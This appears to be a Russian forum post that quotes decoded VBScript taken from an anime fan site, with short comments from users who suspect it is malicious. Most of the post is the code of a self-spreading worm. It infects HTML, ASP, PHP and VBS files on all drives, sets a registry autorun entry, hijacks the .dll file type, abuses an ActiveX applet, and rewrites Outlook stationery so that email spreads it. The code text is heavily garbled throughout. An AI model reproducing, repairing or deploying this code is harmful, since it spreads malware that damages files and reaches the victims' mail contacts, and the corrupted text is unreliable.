+ vb-script на сайте "Аниме в Красноярске" [http://animeshop.h1.ru]: :: раскодированная версия [вставлено в execute(*)] --> Dim0InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,Fin alyDisk0/Sub/KJ_start4)0/KJSetDim4)0/KJCreateMilieu()43KJLikeIt()43KJCreateMail()43KJPropagate()/4End4Sub430/Function4KJAppendTo(FilePath,TypeStr)30On3Error/Resume0Next/4Set4ReadTemp3=/FSO.OpenTextFile4FilePath,1)43TmpStr4=0ReadTemp.ReadAll/4If/Instr(TmpStr,3KJ_start()4)0<>30/Or0Len(TmpStr)0<410Then/4ReadTemp.Close/4Exit3Function0/End/If0/If0TypeStr0=43htt30Then/4ReadTemp.Close/4Set4FileTemp3=/FSO.OpenTextFile4FilePath,2)43FileTemp.Write43<"4&0"BODY4onload=43"/&3"vb script:43&/4KJ_start()"430&43>"4&0vbCrLf3&/TmpStr0&4vbCrLf/&3HtmlText0/FileTemp.Close0/Set/FAttrib/=3FSO.GetFile(FilePath)/4FAttrib.attributes/=33443Else0/ReadTemp.Close0/Set/FileTemp4=0FSO.OpenTextFile(FilePath,8)/4If/TypeStr/=3"html"4Then30FileTemp.Write3vbCrLf4&0"<30&43HTML>"4&0vbCrLf3&/4<"/&3"BODY/onload="430&43vb script:"4&0"KJ_start4)""43&/4>"/&3vbCrLf4&0HtmlText/4ElseIf/TypeStr/=3"vbs"/Then43FileTemp.Write4vbCrLf/&3VbsText30End0If30FileTemp.Close30End0If30End0Function/430Function/KJChangeSub(CurrentString,LastIndexChar)43If4LastIndexChar0=400Then/4If/Left4LCase(CurrentString),1)4="4&0vbCrLf3&/4<"/&3"BODY/onload="430&43vb script:"4&0"KJ_start4)""43&/4>"/&3vbCrLf4&0HtmlText/4FileTemp.Close/4End4If/4DefaultId0=4WsShell.RegRead43HKEY_CURRENT_USER\Identities\Default0User/ID")43OutLookVersion4=0WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook3Express\MediaVer")43WsShell.RegWrite0"HKEY_CURRENT_USER\Identities\3&DefaultId&3\Software\Microsoft\Outlook3Express\"&4Left(OutLookVersion,1)/&3.0\Mail\Compose3Use3Stationery4,1,4REG_DWORD"/4Call3KJMailReg(4HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook0Express\"&3Left(OutLookVersion,1)4&".0\Mail\Stationery3Name",ShareFile)0/Call4KJMailReg("HKEY_CURRENT_USER\Identities\3&DefaultId&3\Software\Microsoft\Outlook3Express\"&4Left(OutLookVersion,1)/&3.0\Mail\Wide0Stationery3Name",ShareFile)0/WsShell.RegWrite43HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,4REG_DWORD"/4Call3KJMailReg(4HKEY_CURRENT_USER\Software\Microsoft\Windows3Messaging/Subsystem\Profiles\Microsoft4Outlook4Internet3Settings\0a0d020000000000c000000000000046\001e03604,"blank4)0/Call4KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows4NT\CurrentVersion\Windows0Messaging4Subsystem\Profiles\Microsoft3Outlook3Internet0Settings\0a0d020000000000c000000000000046\001e03603,"blank3)/4WsShell.RegWrite3"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference3,131072,"REG_DWORD430Call/KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery3,"blank3)/4KJummageFolder(Left4WinPath,3)/&3"Program0Files\Common/Files\Microsoft/Shared\Stationery3)/4End4Function30/4Function3KJCreateMilieu4)0/On0Error4Resume/Next43TempPath0=43"/4If/Not(FSO.FileExists(WinPath0&43WScript.exe3))4Then30TempPath/=3"system32\430End0If30If3TempPath0=43system32\"4Then30StartUpFile0=4WinPath4&0"SYSTEM\Kernel32.dll"43Else0/StartUpFile/=3WinPath3&/4SYSTEM\Kernel.dll"/4End4If/4WsShell.RegWrite3"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel324,StartUpFile30FSO.CopyFile/WinPath/&3"web\kjwall.gif3,WinPath0&43web\Folder.htt430FSO.CopyFile/WinPath/&3"system32\kjwall.gif",WinPath/&3"system32\desktop.ini"43Call0KJAppendTo(WinPath3&/4web\Folder.htt",3htt3)/4WsShell.RegWrite3"HKEY_CLASSES_ROOT\.dll\",4dllfile430WsShell.RegWrite/4HKEY_CLASSES_ROOT\.dll\Content/Type4,"application/x-msdownload"43WsShell.RegWrite0"HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead(4HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")30WsShell.RegWrite/4HKEY_CLASSES_ROOT\dllfile\ScriptEngine\4,"VBScript"43WsShell.RegWrite0"HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\3,WinPath0&4TempPath3&/4WScript.exe43"%13"/4*"/4WsShell.RegWrite3"HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\4,"{60254CA5-953B-11CF-8C96-00AA00B8708C}30/WsShell.RegWrite43HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\3,"{85131631-480C-11D2-B1F9-00C04F86C324}"/4Set4FileTemp3=/FSO.OpenTextFile4StartUpFile,2,true)43FileTemp.Write4VbsText43FileTemp.Close43En d3Function0/43Function0KJLikeIt()30If3InWhere3<>43html"/Then43Exit0Function/4End4If/4ThisLocation3=/document.location30If3Left(ThisLocation,44)/=3"file"4Then30ThisLocation/=3Mid(ThisLocation,9)30If3FSO.GetExtensionName(ThisLocation)4<>/430then/4ThisLocation3=/Left4ThisLocation,Len(ThisLocation)/-3Len(FSO.GetFileName(ThisLocation)))30End0If30If3Len(ThisLocation)/>33/Then43ThisLocation0=4ThisLocation3&/4\"/4End4If/4KJummageFolder(ThisLocation)30End0If30End0Function/430Function/KJMailReg(RegStr,FileName)0/On0Error4Resume/Next43RegTempStr4=0WsShell.RegRead(RegStr)0/If0RegTempStr3=/430Then/4WsShell.RegWrite3RegStr,FileName30End0If30End0Function/430Function/KJOboSub4CurrentString)/4SubE3=/030TestOut0=400/Do0While4True30TestOut0=4TestOut4+0143If4TestOut4>0283Then0/CurrentString3=/FinalyDisk0&43:\430Exit/Do0/End/If0/On0Error4Resume/Next43Set3ThisFolder4=0FSO.GetFolder4CurrentString)/4Set4DicSub/=3CreateObject("Scripting.Dictionary4)0/Set/Folders/=3ThisFolder.SubFolders/4FolderCount4=0043For3Each0TempFolder3in4Folders43FolderCount3=/FolderCount/+31/4DicSub.add/FolderCount,4TempFolder.Name43Next0/If0DicSub.Count/=30/Then43LastIndexChar/=3InstrRev(CurrentString,3\",Len4CurrentString)-1)0/SubString3=/Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)30CurrentString4=0KJChangeSub(CurrentString,LastIndexChar)/4SubE3=/130Else/4If/SubE4=004Then30CurrentString4=0CurrentString4&0DicSub.Item(1)3&/4\"/4Exit3Do43Else0/j3=/030For0j4=014To/FolderCount/4If/LCase(SubString)4=0LCase4DicSub.Item4j))4Then30If3j/<3FolderCount3Then0/CurrentString3=/CurrentString3&/DicSub.Item(j+1)4&0"\30/Exit4Do/4End4If/4End4If/4Next30LastIndexChar4=0InstrRev(CurrentString,"\4,Len(CurrentString)-1)/4SubString0=4Mid4CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)0/CurrentString3=/KJChangeSub(CurrentString,LastIndexChar)43End3If43End3If43Loop0/KJOboSub4=0CurrentString43End3Function0/43Function0KJPropagate()43On4Error0Resume3Next0/RegPathValue4=0"HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook3Express\Degree430DiskDegree3=/WsShell.RegRead(RegPathValue)30If3DiskDegree4=0"43Then0/DiskDegree0=4FinalyDisk/&3":\30/End/If0/For/i=1/to0543DiskDegree4=0KJOboSub(DiskDegree)/4KJummageFolder(DiskDegree)/4Next30WsShell.RegWrite/RegPathValue,DiskDegree/4End4Function30/4Function3KJummageFolder4PathName)0/On0Error4Resume/Next43Set3FolderName4=0FSO.GetFolder4PathName)0/Set/ThisFiles3=/FolderName.Files43HttExists/=30/4For4Each3ThisFile0In3ThisFiles/4FileExt4=0UCase4FSO.GetExtensionName(ThisFile.Path))30If3FileExt3=/4HTM43Or4FileExt4=0"HTML43Or4FileExt4=0"ASP"4Or/FileExt/=3"PHP"/Or0FileExt0=43JSP30Then/4Call3KJAppendTo4ThisFile.Path,"html4)0/ElseIf0FileExt0=43VBS30Then/4Call3KJAppendTo4ThisFile.Path,"vbs")30ElseIf3FileExt3=/4HTT43Then0/HttExists3=/130End0If30Next/4If/4UCase(PathName)4=0UCase4WinPath4&0"Desktop\4))/Or0(UCase(PathName)/=3UCase(WinPath/&3"Desktop"))Then30HttExists4=0143End3If43If4HttExists0=400Then/4FSO.CopyFile3WinPath3&/4system32\desktop.ini3,PathName/4FSO.CopyFile3WinPath3&/4web\Folder.htt",PathName30End0If30End0Function/430Function/KJSetDim4)0/On0Error4Resume/Next43Err.Clear/4TestIt/=3WScript.ScriptFullname43If4Err4Then30InWhere0=43html"/4Else30InWhere0=43vbs30/End/If0/If0InWhere0=43vbs30Then/4Set4FSO4=0CreateObject(4Scripting.FileSystemObject")30Set0WsShell0=4CreateObject("WScript.Shell4)0/Else43Set3AppleObject3=/document.applets43KJ_guest")43AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")43AppleObject.createInstance4)0/Set/WsShell/=3AppleObject.GetObject()30AppleObject.setCLSID(4{0D43FE01-F093-11CF-8940-00A0C9054228}")30AppleObject.createInstance()/4Set4FSO4=0AppleObject.GetObject4)0/End/If0/Set/DiskObject0=4FSO.Drives/4For4Each3DiskTemp0In3DiskObject43If4DiskTemp.DriveType/<>024And4DiskTemp.DriveType/<>014Then30Exit/For/4End4If/4FinalyDisk/=3DiskTemp.DriveLetter0/Next43Dim3OtherArr(3)30Randomize43For3i=03To430/OtherArr4i)/=3Int((94*0Rnd))43Next0/TempString0=43"/4For4i=14To/Len(ThisText)30TempNum0=4Asc4Mid4ThisText,i,1))/4If/TempNum/=3134Then30TempNum0=428/4ElseIf/TempNum/=3104Then30TempNum0=429/4End4If/4TempChar3=/Chr(TempNum/-3OtherArr(i4Mod44))43If4TempChar3=/Chr(34)/Then43TempChar0=4Chr418)43End3If43TempString4=0TempString3&/TempChar43Next0/UnLockStr3=/4Execute43"Dim0KeyArr(3),ThisText3"&vbCrLf&"4KeyArr(0)0=430&4OtherArr(0)4&0"43&vbCrLf&""KeyArr(1)3=/43&/OtherArr41)/&3""4&vbCrLf&3"KeyArr(2)4=0"4&0OtherArr(2)0&43""&vbCrLf&43KeyArr43)/=3"/&3OtherArr(3)3&/43"&vbCrLf&"4For4i=14To/Len(ExeString)""&vbCrLf&43TempNum3=/Asc(Mid(ExeString,i,1))"4&vbCrLf&3"If3TempNum3=/180Then"4&vbCrLf&3"TempNum0=434"4&vbCrLf&3"End0If3"&vbCrLf&"4TempChar3=/Chr(TempNum/+3KeyArr4i0Mod04))""&vbCrLf&43If4TempChar3=/Chr(28)/Then43&vbCrLf&""TempChar4=0vbCr"4&vbCrLf&3"ElseIf3TempChar0=4Chr429)4Then3"&vbCrLf&"4TempChar3=/vbLf43&vbCrLf&""End/If""&vbCrLf&43ThisText0=4ThisText3&/TempChar43&vbCrLf&""Next43)"4&0vbCrLf3&/4Execute4ThisText)"/4ThisText3=/4ExeString0=43""4&0TempString3&/43""43HtmlText0=4<"/&3"script3language=vbscript>43&/vbCrLf0&43document.write430&43""43&/4<"/&3"div0style=3position:absolute;4left:0px;0top:0px;/width:0px;0height:0px;0z-index:28;0visibility:0hidden3>"4&0"<3"&43"/&3"APPLET3NAME=KJ3"&43_guest4HEIGHT=03WIDTH=03code=com.ms.""&3"activeX.Active3"&43XComponent>30&43<"4&0"/APPLET>43&/4<"/&3"/div>43"/&3vbCrLf4&0"<30&43/script>"/&3vbCrLf4&0"<30&43script4language=vbscript>"4&0vbCrLf3&/ThisText4&0vbCrLf3&/UnLockStr3&/vbCrLf0&43<"4&0"/script>43&/vbCrLf0&43<"4&0"/BODY>"/&3vbCrLf4&0"<30&43/HTML>430VbsText0=4ThisText3&/vbCrLf0&4UnLockStr0&4vbCrLf/&3"KJ_start()30/WinPath/=3FSO.GetSpecialFolder(0)3&/4\"/4If/4FSO.FileExists(WinPath/&3"web\Folder.htt3))4Then30FSO.CopyFile/WinPath/&3"web\Folder.htt3,WinPath0&43web\kjwall.gif430End0If30If3(FSO.FileExists(WinPath3&/4system32\desktop.ini3))4Then30FSO.CopyFile/WinPath/&3"system32\desktop.ini",WinPath4&0"system32\kjwall.gif"43End3If43End3Function :: отдельное спасибо тем кто поведает суть кода [!] + чую недобрый скрипт, ой недобрый :angry: [владельца сайта на кол] + кстати то же самое встречается еще на нескольких аниме-проектах ...